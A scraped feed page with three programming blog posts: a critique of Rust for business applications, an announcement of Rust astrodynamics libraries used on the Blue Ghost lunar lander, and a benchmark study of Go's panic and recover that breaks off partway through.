    Rust is probably the first non-esoteric language that adopted a borrow checker as a regular tool. However, this comes with some drawbacks: at its current stage the borrow checker is still not very advanced and extremely conservative, requiring the programmer to do a lot of defensive programming and workarounds in order to make it happy. And most likely it will never be improved beyond minor points, as that would require a breaking change.

    In short: you can imagine the borrow checker as a recursive read/write lock enforced on all fields and variables at compile time - at any given moment you can have multiple read-only references to the same object or one read-write reference, but never a mix of the two. Additionally, in order to hold a reference of a given type to a field in an object graph, you need the same (immutable/mutable) or a stronger (mutable) reference to its parent.
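    The analogy fits in a few lines (this snippet is deliberately rejected by the compiler, which is the whole point):

    fn main() {
        let mut v = vec![1, 2, 3];
        let r = &v[0];   // shared borrow: the "read lock" is taken
        v.push(4);       // error[E0502]: cannot borrow `v` as mutable
        println!("{r}"); // the shared borrow is still live down here
    }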

    If we think in the category of locks, you can imagine a deadlock problem: A needs to wait for B, and B needs to wait for A, to acquire their corresponding locks. In Rust's borrow checker, such situations are compiler errors. The same logic is used by Rust to operate on actual locks, but don't worry: it doesn't mean that Rust is a deadlock-free language.

    What it means, however, is that there's no easy way to represent cyclic data structures in Rust (here's a description of the famous doubly-linked list problem), since - unlike pretty much any other language - it explicitly disallows you from holding a mutable reference alongside any other reference to the same variable (even in the same thread).

    And speaking of cyclic data structures: you can sometimes implement them in a straightforward manner with Rc<RefCell<T>>/Arc<Mutex<T>>, but the problem is that:

    1. RefCells can easily blow up, since they work the same way as the borrow checker but at runtime, while a Mutex can deadlock at runtime. Neither of them is "zero cost".
    2. You need to keep track of references with strong and weak pointers, which is usually not an issue unless your object graph needs to be a bit more complicated for some reason. Get it wrong, and you'll get a memory leak (sketched below). One of Rust's promises was to reduce these, but that only holds in comparison to traditional "systems" languages like C/C++; the comparison falls apart against managed languages.
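    A minimal sketch of that leak (assuming nothing beyond std): two nodes holding strong Rc handles to each other keep their reference counts above zero forever, so their destructors never run:

    use std::cell::RefCell;
    use std::rc::Rc;

    struct Node {
        other: RefCell<Option<Rc<Node>>>,
    }

    fn main() {
        let a = Rc::new(Node { other: RefCell::new(None) });
        let b = Rc::new(Node { other: RefCell::new(Some(a.clone())) });
        *a.other.borrow_mut() = Some(b.clone()); // cycle closed: a -> b -> a
        // Both strong counts are now 2; dropping `a` and `b` at the end of
        // main only gets them down to 1, so the heap memory is never freed.
        // Demoting one edge to rc::Weak is what breaks the cycle.
        println!("strong(a) = {}", Rc::strong_count(&a)); // prints 2
    }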

    I get why it's there, but forcing it blindly and everywhere as the default behaviour is fucking bullshit: which is apparently acknowledged by the authors themselves, since the common way of getting two mutable references into an array is to split it into two separate slices using a method that operates on unsafe pointers under the hood. Shout-out to all the haters saying that unsafe Rust is not idiomatic: it's not only idiomatic, it's necessary.

    Borrow checker and encapsulation

    Another thing about the borrow checker is that it has a very shallow understanding of your code. It explicitly makes the conservative assumption that if you call a method on some reference, the method may access ALL fields behind that reference, invalidating any other field borrow held across the call.

    Let's check this out on the following example:

    use std::collections::HashMap;
    
    // `Entry` stands in for whatever per-client record the original post
    // assumes; it is not shown in the article.
    struct Entry;
    
    struct X {
        commit_offset: usize,
        entries: HashMap<u32, Vec<Entry>>,
        changed: HashMap<u32, Vec<usize>>,
    }
    
    impl X {
        fn change_uncommitted<F>(&mut self, client: &u32, f: F)
            where F: Fn(&mut Entry) -> bool 
        {
            let mut i = self.commit_offset;
            if let Some(entries) = self.entries.get_mut(client) {
                // get iterator over uncommitted entries for given client
                for e in entries.as_mut_slice()[self.commit_offset..].iter_mut() {
                    if f(e) {
                        let changed = self.changed.entry(*client).or_default();
                        changed.push(i);
                    }
                    i += 1;
                }   
            }
        }
    }
    

    Now let's try to encapsulate it a little to make it more readable - nothing much, just extract our cryptic iterator statement to give it some context:

    impl X {
    	/// get iterator over uncommitted entries for given client
        fn get_uncommitted(&mut self, client: &u32) -> Option<&mut [Entry]> {
            let e = self.entries.get_mut(client)?;
            Some(&mut e.as_mut_slice()[self.commit_offset..])
        }
        
        fn change_uncommitted<F>(&mut self, client: &u32, f: F)
            where F: Fn(&mut Entry) -> bool 
        {
            let mut i = self.commit_offset;
            if let Some(entries) = self.get_uncommitted(client) {
                for e in entries.iter_mut() {
                    if f(e) {
                    // compilation failure: get_uncommitted already borrowed
                    // `&mut self` in the scope of this if let, so we cannot
                    // access `self.changed`
                        let changed = self.changed.entry(*client).or_default();
                        changed.push(i);
                    }
                    i += 1;
                }   
            }
        }
    }
    

    The second implementation fails to compile. Not because it's wrong, not because we broke something (in fact the two implementations are identical), but because it makes the borrow checker sad.

    This is in fact a recurring theme: when working in Rust, you'll often find yourself in situations where you need to split your types or methods in a specific way, just because the borrow checker says so. It's mandatory, even when it adds no value (or straight up removes it) to your project.

    Performance ceiling vs time to performance

    One of the common misconceptions about Rust is that apps written in Rust are fast simply because they are written in Rust. This is true to some extent if we compare them against dynamic languages like Python, Ruby or JavaScript, but it falls short when we start comparing with services written in e.g. Go, Java or .NET.

    This may be due to an oversimplified view of the performance characteristics of real-world apps:

    1. Winning hyper-optimization wars in micro-benchmarks rarely translates to visible results in business apps, where our own code is usually ~10% of what's executed overall: the rest is databases, web stacks, serializers etc.
    2. For those apps, most optimizations come from proper database and network usage, system architecture and picking the right algorithm. Language wrestling matters a lot less, at least when we talk about languages in the same performance "weight class".

    Moreover, picking Rust may cause a let-down in performance expectations - I've seen people writing their apps in both Rust and e.g. C# and noticing that their C# apps were actually faster. This comes from another issue: on your first try, you'll probably write your Rust app just well enough to make it compile, do the actual task and avoid glaring performance issues. Most likely you'll stick to its defaults and - in a business setting - this will be the last time you try to optimize that piece of code.

    This boils down to the difference between:

    • Performance ceiling, which means how fast a program written in a given language can possibly be. This is usually low for dynamic languages (since they abstract a lot), but very high for Rust. However, on platforms such as .NET or Swift, where we can choose to work closer to the metal if we want to, this difference is not that significant.
    • Time to performance, which basically means: "how long does it take to solve a problem with acceptable performance". And personally: Rust falls behind many managed languages on that metric, mainly because of things like the borrow checker and the multi-threading issues I cover later.

    Your business app will probably be working over things like strings, byte buffers and object graphs to carry business data between the DB and the web framework. This means it will move and copy a lot of data around: something that default Rust primitives are not particularly great at, e.g. String::clone in Rust performs a deep copy (where in managed languages it's just a pointer copy), while String itself is just a wrapper around a capacity-bound Vec<u8>, which means strings may also be bigger than they need to be.
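    A small sketch of that difference (assuming nothing beyond std): cloning a String copies the entire heap buffer, while cloning an Arc<str> only bumps a reference counter:

    use std::sync::Arc;

    fn main() {
        let s = "some business payload ".repeat(1_000); // a ~22 KB String
        let deep = s.clone();                  // memcpy of the full buffer
        let shared: Arc<str> = Arc::from(s.as_str());
        let cheap = Arc::clone(&shared);       // one atomic increment, no copy
        assert_eq!(deep.len(), cheap.len());
    }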

    Copying "references" can be much more expensive than in languages with managed memory because of ref-based garbage collector: i.e. for Vec<Arc<T>> means not only memcpy over vector heap space but also following increment of ref counters in every of the nested Arc pointers (including loading each of them from heap into register and coordinating new counter values between CPU caches).

    And since we're at Arc/Rc or even Box: once you need to deal with graphs of objects or move data between coroutines or threads, you'll find yourself using them quite a lot. The problem is that this technique of allocating is nowhere near as fast as the bump-pointer allocators that managed languages use. The actual win is when we need to release memory, which in Rust doesn't introduce GC pauses. However, modern runtimes, e.g. Go or Java's Z collector, can provide constrained GC pauses that keep latency in check and avoid pathological cases (which is fine for most business apps, except maybe the HFT space). Moreover, they can offload memory release to background threads, which is not the case in Rust and which for big object graphs can also affect latency.

    And while technically Rust's memory footprint would be expected to be lower, in practice that doesn't have to be the case (because of all the deep copying of heap objects and the fact that many Rust pointers are pinned, causing fragmentation).

    Rust is NOT good for multi-threaded apps

    Some developers like to claim that - thanks to its strict borrow checker - Rust makes multi-threaded programming safe and reliable. This statement may hold in comparison with languages like C/C++, but once again it easily falls apart once you compare Rust against any of the contenders already mentioned.

    .await pain

    First problem: building multi-threaded apps in Rust is simply painful. Two thirds of this pain comes from the fact that if you ever have to do it, you'll most probably be put to work with async/await and the tokio runtime.

    Once you need to work with Rust futures and async code, you'll be exposed to a whole new world of micro-complexities, e.g.:

    • How you cannot just access objects and their fields, but have to work with pinning and Unpin.
    • How to build async iterators: while async_stream is there, from time to time you'll have to roll something by hand, and it's a much harder process than in any other language supporting this feature that I know of.
    • Differences between regular threads/locks, and their asynchronous equivalents.
    • Why the hell do you need async_trait and why it's even configurable.
    • How Send and Sync makes each of the issues above exponentially harder than they already are.
    • And how the fact that you have pluggable runtimes - and sometimes need to use more than one in your app, e.g. tokio+rayon - makes things even more interesting.

    I think that this blog post is a good critique of the current state of async Rust.

    If you're going to pass your objects across threads, Rust forces some constraints on the code you're writing - such as the Send + 'static bounds - even if that code is executed in only a single execution scope at a time. The problem is that in tokio - the dominant runtime in the Rust ecosystem - the primary way of parallelizing work is via the spawn method, which uses a work-stealing scheduler: it moves suspended executions from busy to idle threads as it sees fit. This usually requires ensuring that most of your async code base is Send + 'static compatible.

    What's nice about the Send and Sync traits is that they are inferred from the bodies of the async methods you implement. What's not nice is that they are not immediately visible, so you may accidentally break API guarantees by changing a few lines somewhere down a method call stack without even noticing, resulting in your methods no longer being forkable by tokio::spawn.
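    A minimal sketch of the constraint (assuming the tokio crate; this snippet is deliberately rejected by the compiler): the future handed to tokio::spawn may be moved to another worker thread at any .await point, so everything it captures must be Send:

    use std::rc::Rc;

    async fn handler() {
        let shared = Rc::new(42); // Rc is !Send
        tokio::spawn(async move {
            // error: future cannot be sent between threads safely,
            // because the captured `Rc<i32>` is not `Send`
            println!("{shared}");
        });
    }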

    Locks. Locks everywhere.

    In practice, all of the Send + 'static constraints mentioned above mean that all kinds of shared data now need to be wrapped in Arc<Mutex<T>>/Arc<RwLock<T>>. But which mutexes and locks are we talking about?

    • Since std::sync::RwLock is basically a wrapper around OS primitives, it's very heavy. Most notably, it doesn't offer an async/await API, so it's going to block threads from the tokio thread pool, which is damaging for server performance.
    • parking_lot::RwLocks are much more lightweight - they use optimistic locking with atomic counters. They still don't offer an async/await API though, potentially blocking the thread pool in the process.
    • futures_locks::RwLock sounds like a good idea if you aim for runtime-agnostic async locks, until you look into the implementation and realize that it's just bait and the whole thing uses regular locks inside.
    • Tokio has its own RwLock, which offers an async/await API but comes with some caveats, like:
      • If you use its blocking lock methods inside a context in which the tokio runtime is available, it will straight up panic, crashing your app. And sometimes you just may have to call it in a context where the runtime is available but your code cannot be async, calling for another layer of workarounds.
      • It doesn't offer reentrancy or upgradeable locks (promoting read locks into write ones).
    • Finally, async_lock::RwLock, which offers an async/await API, an optimal implementation, lock upgrades, and doesn't crash your server because the author didn't like the way you're using his library. PS: don't worry, I don't like it either, but I'm here to do what I can with what I have at hand, not to write poetry.

    So once you finally get your PhD in lock algorithms in Rust, you're finally at the level where you can do the job as efficiently as a Go dev who learned their whole language in 2 hours. And god forbid you ask yourself the question: why do I need to use locks if this code is never accessed concurrently?

    The best part is that - unlike e.g. Pony - the Rust compiler doesn't guarantee the absence of deadlocks in your code. Even better: since locks are so widespread, deadlocks are even more likely to occur. It doesn't even have to happen because you're using locks wrong; it can happen just because you didn't know that the code you're calling uses them somewhere below (sending changes over a tokio::watch channel is itself a great example of that).

    Actors

    One of the stunning issues I've found in Rust is that, given how well borrow-checker ownership matches the actor model, the actor libraries in Rust are lacking. I'm not talking about all of them, since I had neither the time nor the energy to check out every one of the 47 actor libraries listed for a good start, but that number strongly suggests a syndrome where, after the first few, every new attempt was trying to solve some issues with existing implementations, creating new ones in the process. If you're using actors for your business app, most likely it will be one of the 3 most popular, and most likely it will be actix, because you've been baited by its popularity and the pretty mature web framework attached to it.

    The problem with Actix is that its core was defined before the era of async/await Rust. This means it doesn't natively support async actor methods - and if you need a server app doing any kind of I/O, you WILL have to use async Rust eventually. Eventually some support for async was added, but now you need to educate yourself on which of the 4 different response types that support futures should be used in which situation. AFAIK none of these support using a &mut self actor in an async method (and we don't count actix_async_handler, since it has a list of limitations longer than the actual documentation). It's about as handy as a knife with 4 different blades but no handle.

    In practice, the most popular pattern I've seen is simply using a tokio channel combined with tokio::spawn, which is essentially a crude cousin of an actor: more verbose and missing all of its benefits, like structured message handling, lifecycle management, state encapsulation, parent-children hierarchies etc.
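    For illustration, here is a sketch of that pattern (assuming the tokio crate): a task owning its state and draining an mpsc channel, an actor in all but name, with none of the supervision or lifecycle support a real framework would give you:

    use tokio::sync::{mpsc, oneshot};

    enum Msg {
        Deposit(u64),
        Balance(oneshot::Sender<u64>),
    }

    fn spawn_account() -> mpsc::Sender<Msg> {
        let (tx, mut rx) = mpsc::channel(32);
        tokio::spawn(async move {
            let mut balance: u64 = 0; // state encapsulated only by convention
            while let Some(msg) = rx.recv().await {
                match msg {
                    Msg::Deposit(amount) => balance += amount,
                    Msg::Balance(reply) => { let _ = reply.send(balance); }
                }
            }
            // channel closed: the "actor" dies silently, nobody is notified
        });
        tx
    }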

    Panics

    While Rust errors are pretty safe - thanks to being part of the method declaration - they are not alone: panics are still there. And unlike errors, you'll never be 100% sure that you've avoided all of them. Technically you could use some way to signal their existence, e.g. unsafe brackets or something, but in practice it's hard to be sure.

    One of the issues is the ever-present .unwrap calls. Technically they are meant to be used with caution, but if you're glossing over a code base, the only difference between hash_map.get().unwrap() (which can fail often) and path_buf.to_str().unwrap() (which will most likely never fail in your app) is your experience.

    Other issues include:

    • Panics on index accesses.
    • Panics on double borrow/borrow_mut from RefCells - patterns which are perfectly fine in many languages but in Rust will crash your entire app, because the borrow checker doesn't like second guesses.
    • Panics with stack overflows, because the state machines generated by your async methods may be a "bit" bigger than expected: but at least nothing was heap-allocated while solving this problem.

    What's important to notice here: we're talking about panics that will crash your server, affecting not only the current request handler but everyone using your services. That's the major difference between Rust failures and the exceptions used in managed languages. And sure, you could say that these can be fixed with proper programmer discipline, but isn't the Rust promise of the compiler taking care of dangerous coding mistakes the reason why we put in the effort to learn it and deal with all of the borrow-checker bullshit along the way?

    Death by a thousand cuts

    Individually, the issues above can often be solved with some experience, and cast off as a "skill issue". But together they build up into a developer's mental fatigue: you're here to solve business problems, yet at every step you need to solve "plumbing issues" and make decisions about the memory model, including the feature changes and refactoring they'll require in the future. Each one of them is considered crucial by the borrow checker, to the point where it either causes a compilation error or a runtime panic.

    There are places where fine-grained control over program memory and performance tuning is beneficial and can be one of the business goals: these are things from the broad area of systems engineering. However, for your daily ERP app, the complexity coming from trying to reflect real-life interactions with all their exceptions and imprecisions is enough: you're not going to be praised because your asset management app takes 10% less CPU while the task backlog has doubled in the meantime.

    So if you're a founder or developer thinking about using Rust for your next business project because some crypto start-up is developing their quasi-bank in it and it would look nice in your resume, please think twice and don't make a regrettable decision for yourself and your colleagues.

    ]]>
    https://www.bartoszsypytkowski.com/is-rust-a-good-fit-for-business-apps/ hacker-news-small-sites-43217892 Sat, 01 Mar 2025 10:20:34 GMT
    <![CDATA[Nyx Space and Rust Power Firefly's Blue Ghost Lunar Landing]]> thread link) | @lukastyrychtr
    March 1, 2025 | https://nyxspace.com/blog/2025/02/21/nyx-space-and-rust-power-fireflys-blue-ghost-lunar-landing/ | archive.org

    On March 2, 2025, Firefly Aerospace will attempt to land its Blue Ghost 1 spacecraft on Mare Crisium, a vast lunar plain on the Moon. This historic mission, which you can follow via live stream on YouTube or through official updates, is powered in part by Rust—specifically, by the open-source Nyx Space libraries: Nyx, ANISE, and Hifitime.

    These libraries form the backbone of the mission's flight dynamics toolset. Here’s how they’re helping guide Blue Ghost to its lunar destination.

    Nyx Space libraries are open source: Nyx under AGPL 3.0 and ANISE/Hifitime under MPL 2.0. By releasing these tools publicly, we aim to empower engineers across industries—from aerospace startups to academic researchers—to build robust solutions to challenging problems. Astrodynamics is hard enough as it is; use Nyx Space instead of reinventing the wheel.


    ANISE: Precise Trajectory Computations

    Since the 1980s, NASA's SPICE toolkit has been essential for interplanetary missions. ANISE builds upon this legacy as a modern, fully-featured rewrite in Rust. It introduces significant enhancements, including azimuth, elevation, and range (AER) computations, safe multi-threading, and Python bindings via PyO3.

    For Blue Ghost, ANISE generates data products for all subsystems from the trajectory files provided by the flight dynamics team (FDO). Its accuracy has already been proven: ANISE correctly predicted the spacecraft's first eclipse to within one second of when it actually occurred—a testament to its precision.


    Hifitime: Synchronizing Ground and Space

    Executing maneuvers with sub-second precision is critical for mission success. The FDO team, led by Chris Rabotin, requires that maneuvers occur within 100 milliseconds of their planned time; any deviation means that the gravitational acceleration from celestial objects like the Earth or Moon differs from what was assumed during maneuver planning.

    Hifitime ensures this precision by handling time scale conversions between Ephemeris Time (ET), used in trajectory data for its consistency in cislunar space, and UTC, which governs ground systems. ANISE complements this by calculating light-time delays between Blue Ghost and ground stations while accounting for relativistic effects such as aberration. Together, these tools ensure flawless timing synchronization between Earth and space.


    Nyx: High-Fidelity Orbit Determination

    Above GPS altitudes, spacecraft cannot rely on satellite navigation. Instead, they depend on ground-based tracking data processed through orbit determination algorithms. Nyx excels in this domain.

    Nyx is a high-performance library for spaceflight dynamics that incorporates advanced models such as non-spherical gravity fields and solar radiation pressure. It directly ingests CCSDS TDM—the standard format for spacecraft tracking data—and processes it using its Kalman filter for high-fidelity orbit determination. This capability had previously been validated in real-world scenarios like the Lunar Reconnaissance Orbiter example.


    If you've read this far, let's chat!

    ]]>
    https://nyxspace.com/blog/2025/02/21/nyx-space-and-rust-power-fireflys-blue-ghost-lunar-landing/ hacker-news-small-sites-43217811 Sat, 01 Mar 2025 10:09:25 GMT
    <![CDATA[The cost of Go's panic and recover]]> thread link) | @todsacerdoti
    March 1, 2025 | https://jub0bs.com/posts/2025-02-28-cost-of-panic-recover/ | archive.org

    TL;DR

    • Some of the wisdom contained in Josh Bloch’s Effective Java book is relevant to Go.
    • panic and recover are best reserved for exceptional circumstances.
    • panic and recover are slow, incur heap allocations, and preclude inlining.
    • Internal handling of failure cases via panic and recover is tolerable and sometimes beneficial.

    Abusing Java exceptions for control flow

    Even though my Java days are long gone and Go has been my language of predilection for a while, I still occasionally revisit Effective Java, Joshua Bloch’s seminal and award-winning book, and I never fail to rediscover nuggets of wisdom in it. In item 69 (entitled Use exceptions only for exceptional conditions) of the book’s third edition, Bloch presents an example of abusing Java exceptions for control flow. I’m hesitant to quote the content of that section in full here for fear of a copyright strike from Bloch’s publishing company, but it—and, in fact, the whole book—is well worth a read.

    Bloch opens with the following code snippet, which demonstrates a rather peculiar way of iterating over an array (named range) of objects of some Mountain class so as to invoke their climb method:

    try {
      int i = 0;
      while (true)
        range[i++].climb();
    } catch (ArrayIndexOutOfBoundsException e) {
    }
    

    Note that variable i eventually gets incremented up to the length of the array, at which point an attempt to access the array at i raises an ArrayIndexOutOfBoundsException, which gets caught and promptly ignored. Of course, a functionally equivalent but far clearer and more idiomatic approach consists in relying on a “for-each” loop, which itself amounts to a classic three-clause loop:

    for (int i = 0; i < range.length; i++) {
      range[i].climb();
    }
    

    Bloch patiently proceeds to explain why some misguided practitioners may favour the exception-based approach over the more idiomatic one: not only do they perceive the termination test (i < range.length) as costly, but they deem it superfluous. Why? Because they believe that the Java compiler introduces a bounds check for every array access (range[i]). If memory safety is guaranteed by those systematic bounds checks, they reason, why even bother checking whether the index variable goes out of bounds?

    Bloch then debunks this theory via three counterarguments:

    1. Because exceptions are designed for exceptional circumstances, there is little incentive for JVM implementors to make them as fast as explicit tests.
    2. Placing code inside a try-catch block inhibits certain optimizations that JVM implementations might otherwise perform.
    3. The standard idiom for looping through an array doesn’t necessarily result in redundant checks. Many JVM implementations optimize them away.

    Follows this empirical observation:

    […] the exception-based idiom is far slower than the standard one. On my machine, the exception-based idiom is about twice as slow as the standard one for arrays of one hundred elements.

    How is this relevant to Go?

    The designers of Go deliberately shied away from equipping the language with an exception system like Java’s:

    We believe that coupling exceptions to a control structure, as in the try-catch-finally idiom, results in convoluted code. It also tends to encourage programmers to label too many ordinary errors, such as failing to open a file, as exceptional.

    Go takes a different approach. For plain error handling, Go’s multi-value returns make it easy to report an error without overloading the return value. A canonical error type, coupled with Go’s other features, makes error handling pleasant but quite different from that in other languages.

    Go also has a couple of built-in functions to signal and recover from truly exceptional conditions. The recovery mechanism is executed only as part of a function’s state being torn down after an error, which is sufficient to handle catastrophe but requires no extra control structures and, when used well, can result in clean error-handling code.

    However, some newcomers to Go may, at least at first, struggle to adopt the language’s idiom of communicating anticipated failure cases as values rather than as exceptions; they may be tempted to abuse Go’s panic and recover built-in functions for communicating even benign failure cases.

    Go’s ecosystem (language, compiler, runtime, etc.) may be vastly different from Java’s, but transposing Bloch’s experiment from Java to Go is nonetheless an instructive and playful way to discuss the cost of panic and recover, and perhaps stifle newcomers’ urge to unduly rely on that mechanism in their programmes.

    Abusing Go’s panic/recover for control flow

    In the remainder of this post, I’ll assume Go 1.24 semantics and use the Go compiler (gc) of the same version.

    Roughly translated to Go and molded into a self-contained package, Bloch’s code snippet becomes the following programme (available on GitHub):

    package main
    
    type Mountain struct {
      climbed bool
    }
    
    func (m *Mountain) Climb() {
      m.climbed = true
    }
    
    func main() {
      mountains := make([]Mountain, 8)
      ClimbAllPanicRecover(mountains)
    }
    
    func ClimbAllPanicRecover(mountains []Mountain) {
      defer func() {
        recover()
      }()
      for i := 0; ; i++ {
        mountains[i].Climb() // panics when i == len(mountains)
      }
    }
    
    func ClimbAll(mountains []Mountain) {
      for i := range mountains {
        mountains[i].Climb()
      }
    }

    (playground)

    As its name suggests, function ClimbAllPanicRecover abuses panic and recover for iterating over the input slice, whereas function ClimbAll stands for the more idiomatic reference implementation.

    Bloch never reveals what his Mountain class is made of or what its climb method does. To forestall any dead-code elimination by the compiler, I’ve opted to make my (*Mountain).Climb method mutate the climbed field of its receiver.

    The overhead of panic and recover is non-negligible

    Below are some benchmarks pitting ClimbAllPanicRecover against ClimbAll:

    package main
    
    import (
      "fmt"
      "testing"
    )
    
    var cases [][]Mountain
    
    func init() {
      for _, size := range []int{0, 1, 1e1, 1e2, 1e3, 1e4, 1e5} {
        s := make([]Mountain, size)
        cases = append(cases, s)
      }
    }
    
    func BenchmarkClimbAll(b *testing.B) {
      benchmark(b, "idiomatic", ClimbAll)
      benchmark(b, "panic-recover", ClimbAllPanicRecover)
    }
    
    func benchmark(b *testing.B, impl string, climbAll func([]Mountain)) {
      for _, ns := range cases {
        f := func(b *testing.B) {
          for b.Loop() {
            climbAll(ns)
          }
        }
        desc := fmt.Sprintf("impl=%s/size=%d", impl, len(ns))
        b.Run(desc, f)
      }
    }
    

    (Incidentally, if you’re not yet familiar with the new (*testing.B).Loop method, do check out the Go 1.24 release notes.)

    Let’s run those benchmarks on a relatively idle machine and feed the results to benchstat:

    $ go version 
    go version go1.24.0 darwin/amd64
    $ go test -run '^$' -bench . -count 10 -benchmem > results.txt
    $ benchstat -col '/impl@(idiomatic panic-recover)' results.txt
    goos: darwin
    goarch: amd64
    pkg: github.com/jub0bs/panicabused
    cpu: Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
                           │  idiomatic  │              panic-recover              │
                           │   sec/op    │    sec/op      vs base                  │
    ClimbAll/size=0-8        2.239n ± 8%   193.900n ± 1%  +8560.12% (p=0.000 n=10)
    ClimbAll/size=1-8        2.638n ± 1%   196.400n ± 2%  +7346.45% (p=0.000 n=10)
    ClimbAll/size=10-8       5.424n ± 1%   199.300n ± 2%  +3574.41% (p=0.000 n=10)
    ClimbAll/size=100-8      44.69n ± 1%    238.65n ± 4%   +434.01% (p=0.000 n=10)
    ClimbAll/size=1000-8     371.6n ± 0%     565.8n ± 1%    +52.27% (p=0.000 n=10)
    ClimbAll/size=10000-8    3.646µ ± 1%     3.906µ ± 0%     +7.15% (p=0.000 n=10)
    ClimbAll/size=100000-8   36.27µ ± 0%     36.54µ ± 1%     +0.73% (p=0.000 n=10)
    geomean                  95.10n          759.9n        +699.03%
    
                           │  idiomatic  │        panic-recover         │
                           │    B/op     │    B/op     vs base          │
    ClimbAll/size=0-8        0.00 ± 0%     24.00 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=1-8        0.00 ± 0%     24.00 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=10-8       0.00 ± 0%     24.00 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=100-8      0.00 ± 0%     24.00 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=1000-8     0.00 ± 0%     24.00 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=10000-8    0.00 ± 0%     24.00 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=100000-8   0.00 ± 0%     24.00 ± 0%  ? (p=0.000 n=10)
    geomean                            ¹   24.00       ?
    ¹ summaries must be >0 to compute geomean
    
                           │  idiomatic   │        panic-recover         │
                           │  allocs/op   │ allocs/op   vs base          │
    ClimbAll/size=0-8        0.000 ± 0%     1.000 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=1-8        0.000 ± 0%     1.000 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=10-8       0.000 ± 0%     1.000 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=100-8      0.000 ± 0%     1.000 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=1000-8     0.000 ± 0%     1.000 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=10000-8    0.000 ± 0%     1.000 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=100000-8   0.000 ± 0%     1.000 ± 0%  ? (p=0.000 n=10)
    geomean                             ¹   1.000       ?
    ¹ summaries must be >0 to compute geomean
    

    The results are plain to see: ClimbAllPanicRecover is lumberingly slow in comparison to ClimbAll in the case of small enough input slices, for which the cost of panic and recover appears to dominate execution time. This observation echoes Bloch’s first counterargument: panic and recover, because their use is intended for truly exceptional circumstances, have no reason to be particularly fast.

    Moreover, each call to ClimbAllPanicRecover incurs an allocation of 24 bytes (on my 64-bit system, at least); although details are scarce, this heap allocation can be attributed to a runtime.boundsError with which the Go runtime eventually panics when the value of variable i reaches len(mountains). In comparison, ClimbAll never allocates and, therefore, doesn’t exert any unnecessary pressure on the garbage collector.

    The performance gap between the two implementations only closes as the length of the input slice increases and the cost of panic and recover is drowned out by the rest of the workload.

    Recover precludes inlining

    At this stage, astute readers may suggest that ClimbAllPanicRecover’s disadvantage can be explained, at least in part, by inlining. Inlining is a compiler strategy that can be roughly described as “replacing a function call by the body of that function”. In many cases, inlining results in a speedup of execution. However, functions that contain defer statements cannot be inlined, and neither can functions that contain calls to recover. Therefore, contrary to ClimbAll, neither ClimbAllPanicRecover nor the anonymous function whose call it defers can be inlined. Close inspection of the optimisation decisions made by the compiler while building our programme confirms that much:

    $ go build -gcflags '-m=2' .
    # github.com/jub0bs/panicabused
    ./main.go:7:6: can inline (*Mountain).Climb with cost 4 as: method(*Mountain) func() { m.climbed = true }
    ./main.go:17:8: cannot inline ClimbAllPanicRecover.func1: call to recover
    ./main.go:16:6: cannot inline ClimbAllPanicRecover: unhandled op DEFER
    ./main.go:11:6: can inline main with cost 66 as: func() { mountains := make([]Mountain, 8); ClimbAllPanicRecover(mountains) }
    ./main.go:25:6: can inline ClimbAll with cost 14 as: func([]Mountain) { for loop }
    -snip-
    

    This observation echoes Bloch’s second counterargument: relying on panic and recover inhibits certain optimisations that the Go compiler might otherwise perform.

    Is the lack of inlining to blame for ClimbAllPanicRecover’s lacklustre performance, though? Evidently not: I selectively disabled inlining for ClimbAll by slapping a go:noinline directive on it and re-ran the benchmarks, but found that ClimbAll still vastly outperformed ClimbAllPanicRecover for all but large input slices. But the inability to inline a function can noticeably harm performance in more realistic scenarios.
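
    For reference, here is what that experiment looks like: the directive is written immediately above the function declaration, with no space after the slashes, and it forces the compiler to keep the call:

    //go:noinline
    func ClimbAll(mountains []Mountain) {
      for i := range mountains {
        mountains[i].Climb()
      }
    }

    With the directive in place, the -m=2 output reports that ClimbAll is marked go:noinline instead of listing it as inlinable.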

    No bounds-check elimination for the unidiomatic implementation

    Like Java, Go is said to be memory-safe; in particular, per the language specification, implementations must trigger a run-time panic if a slice-indexing operation is ever out of bounds. Such bounds checks are relatively cheap, but they are not free. When the compiler can prove, perhaps via some heuristics, that some slice access cannot be out of bounds, it may omit, for better performance, the corresponding bounds check from the resulting executable. Besides, advanced programming techniques exist for gently nudging the compiler towards more bounds-check elimination.
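
    As an aside (my example, not the post’s), the best-known of those nudges is an up-front index assertion: one deliberate access to the highest index of interest convinces the compiler that the constant-index loads that follow must be in bounds, so it can drop their individual checks. This idiom appears throughout the standard library’s binary-decoding code:

    // load64 decodes a little-endian uint64 from the first 8 bytes of b.
    func load64(b []byte) uint64 {
      _ = b[7] // bounds-check hint: one early check instead of eight
      return uint64(b[0]) | uint64(b[1])<<8 | uint64(b[2])<<16 | uint64(b[3])<<24 |
        uint64(b[4])<<32 | uint64(b[5])<<40 | uint64(b[6])<<48 | uint64(b[7])<<56
    }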

    In the specific case of our little programme, the compiler can eliminate the bounds checks in ClimbAll’s loop, but not in ClimbAllPanicRecover’s:

    $ go build -gcflags="-d=ssa/check_bce/debug=1"
    # github.com/jub0bs/panicabused
    ./main.go:17:12: Found IsInBounds
    

    This observation echoes Bloch’s third counterargument: the idiomatic approach is more conducive to bounds-check elimination.

    What about internal handling of failure cases?

    At this stage, my facetious example may have convinced you that abusing panic and recover for control flow is not only unidiomatic but also detrimental to performance. More seriously, though, you may come across open-source projects that rely on panic and recover for handling internal failure cases. In fact, look no further than the standard library: this style is on full display in packages such as text/template, encoding/json, encoding/gob, and regexp/syntax.

    Expediency seems to be the primary motivation. Indeed, when the call stack is deep (perhaps on account of numerous recursive calls), relying on panic and recover obviates the need for much boilerplate; the error-handling logic can be centralised further up the stack, at the point of panic recovery, and the happy path can remain in focus.
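
    To make this concrete, here is a minimal sketch of the pattern (my own illustration, not lifted from any of those packages): deep recursive code panics with a sentinel error, and the exported entry point recovers it and returns it as an ordinary error. It assumes the standard library’s errors package is imported.

    var errSyntax = errors.New("syntax error")

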